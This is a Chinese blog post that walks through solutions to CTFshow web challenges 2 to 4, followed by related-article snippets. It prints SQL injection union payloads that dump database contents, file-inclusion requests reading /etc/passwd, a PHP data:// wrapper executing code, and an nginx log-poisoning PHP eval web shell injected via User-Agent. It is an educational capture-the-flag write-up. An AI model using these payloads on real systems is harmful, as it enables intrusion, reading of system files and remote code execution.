CTFshow(web2-4)

最新推荐文章于 2024-04-28 05:33:04 发布
最新推荐文章于 2024-04-28 05:33:04 发布
阅读量330 收藏
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51706044/article/details/117380990
版权

文章目录

web02

在这里插入图片描述

在这里插入图片描述
进入可以看到表单,很明显这是POST注入,可以利用万能密码进行登录

测试:
在这里插入图片描述
登陆成功

回显查看
1' or 1=1 union select 1,2,3#
在这里插入图片描述
进行数据库的查询

1'or 1=1 union select 1,database(),3#

在这里插入图片描述
查询表

1' or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema='web2'#

在这里插入图片描述
查询字段

1' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#

在这里插入图片描述
查询字段内容

1' or 1=1 union select 1,flag,3 from flag#

在这里插入图片描述

web03

在这里插入图片描述
根据提示,这是存在文件包含漏洞,提示url 进行测试

?url=/etc/passwd

在这里插入图片描述
可见存在文件包含漏洞
本题可以是使用PHP伪协议+文件包含,实现任意命令执行
方法一
php伪协议中的data通过通配符查找目录下的所有文件

?url=data://text/plain,<?php print_r(glob("*")); ?>

在这里插入图片描述
得到ctf_go_go_go的文件进行访问在这里插入图片描述
在这里插入图片描述
发现一个常见的php伪协议及用法表,贴出来在这里插入图片描述

web04(日志注入)

在这里插入图片描述
可以见到本题与上一题相似,虽然过滤了php,但可能存在文件包含漏洞,进行测试

?url=/etc/passwd

在这里插入图片描述
查看日志信息,发现服务器是nginx;在这里插入图片描述
在这里插入图片描述
在日志包含中,找到nginx的log有两种:

1、?url=/var/log/nginx/access.log
2、?url=/var/log/nginx/error.log

这里:?url=/var/log/nginx/access.log可以打开
在这里插入图片描述
在这里插入图片描述
进行日志注入
为了防止url编码,需要在burp中修改User-Agent

<?php @eval($_POST['2']);?>

在这里插入图片描述
使用蚁剑进行连接

在这里插入图片描述
连接成功后打开目录
在这里插入图片描述
得到flag
在这里插入图片描述

唤变
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow之web5
世间繁华梦一出
05-07 2585
CTFshow——webweb5 web5
CTFshow之web6
世间繁华梦一出
05-07 2506
CTFshow——web6 一打开页面是用户名密码登录,我们首先第一个想到的就是sql注入了,来用万能钥匙试一哈! 报错了 然后,我在密码框里同样注入万能钥匙试了一下,发现,密码框中输入空格也会多一个黑点,于是我猜测可能是把空格过滤了,为了验证 我的猜想,来抓包看一下服务器收到的页面请求包最后传递的用户名和密码的参数值是什么样子的 抓包果然发现,空格被过滤了 一般空格被过滤有如下替换方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 我们就选用/**/来替
ctfshow-WEB-web4
热门推荐
wangyuxiang946的博客
08-20 1万+
ctf.show WEB模块第4关是一个文件包含漏洞,页面提示了源码中的关键代码,使用include()函数接收url参数,include()函数包含的文件会被执行,从而造成任意代码执行,或者配合伪协议获取敏感文件甚至getshell; 然而这一关伪协议不起作用,我们可以通过日志注入进行任意命令执行,从而getshell 页面最明显的位置展示了源码的核心,提示我们利用文件包含漏洞 包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问记录,包括HTTP请求行...
CTF_ctfshow_web4
weixin_54227009的博客
05-13 906
打开网页发现和web3差不多,文件包含url 但尝试了web3,发现error了 伪协议用不了了 可以尝试用一句话连接,bp抓包,上传一句话 但一句话不知道是传到了哪个路径下, 查看网络: 发现是nginx,nginx的日志文件在/var/log/ngnix/access.log或/var/log/ngnix/error.log 故,一句话可以传到日志目录下 将User-Agent这里写进一句话 上传成功: 路径:ctf.show_web4http://f30ab..
ctfshow-WEB-web4_ctf(1)
最新发布
2401_84297618的博客
04-28 230
ctf.show WEB模块第4关是一个文件包含漏洞,页面提示了源码中的关键代码,使用include()函数接收url参数,include()函数包含的文件会被执行,从而造成任意代码执行,或者配合伪协议获取敏感文件甚至getshell;包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问记录,包括HTTP请求行,Referer,User-Agent等HTTP请求的信息。很明显,日志文件的内容多了一条访问记录,但没有我们插入的一句话木马,这很正常,因为日志文件中的代码会被执行,而不会显示。
ctfshow.web4
weixin_71543329的博客
12-23 406
日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。2.同web3一样先使用php伪协议,php://input 发现会被过滤掉,换成PHp这种不行,应该被过滤掉了,所以使用别的方法考虑。日志路径:/var/log/nginx/access.log和 /var/log/nginx/error.log。
ctfshow-web4(文件包含&日志注入)
Welcome To Myon'Blog !
10-08 1244
Nginx中的日志分两种,一种是error.log,一种是access.log。中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。对于Ngnix,日志存放路径:/var/log/nginx/access.log 和 /var/log/nginx/error.log。进入后台,找到flag。
ctfshow-web4
HAI_WD的博客
08-04 601
默认nginx日志是:/var/log/nginx/access.log,可以看到记录了请求。那么我们就可以修改ua头进行代码注入,如果存在ssh连接的话,用ssh日志也可以。然后cat一下获取到flag。
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFshow 反序列化 web262
Kradress的博客
12-20 2584
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 # @message.php # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporti
通过ctfshow web入门262——初时反序列化逃逸
qq_45766062的博客
09-13 825
ctfshow web入门262 1.分析题目: 这道题目是一道反序列化逃逸问题: $umsg = str_replace('fuck', 'loveU', serialize($msg)); 可以看到在注释中有一个message.php的文件,这里我们我们访问: 我们发现需要修改token为admin,并且传递的cookie要以base64编码。 字符逃逸的原理: (1)当正常传入参数时: <?php class message{ public $from; public $
CTFSHOW系列-web4(信息收集-robots.txt文件)
siu~
11-23 500
CTFSHOW系列解题思路
反序列化逃逸学习-CTFSHOW-web262
weixin_45931722的博客
10-14 349
首先进入看代码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 # @message.php # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0);
CTFshow web4 详解
lzu_lfl的博客
10-15 2365
日志写码getshell
CTFshow-web-web4
qq_68581192的博客
10-08 141
点击放包,发现日志文件的内容多了一条访问记录,但是没有我们插入的一句话木马(因为日志文件中的代码会被执行,但是不会显示)php eval($_POST['txy'])?> // ['']单引号里面是连接的密码。可以使用代理工具Burp Suite抓包,在User-Agent中插入一句话木马。包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问记录。找到www目录下有一个flag.txt文件。进入此文件,找到flag。
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值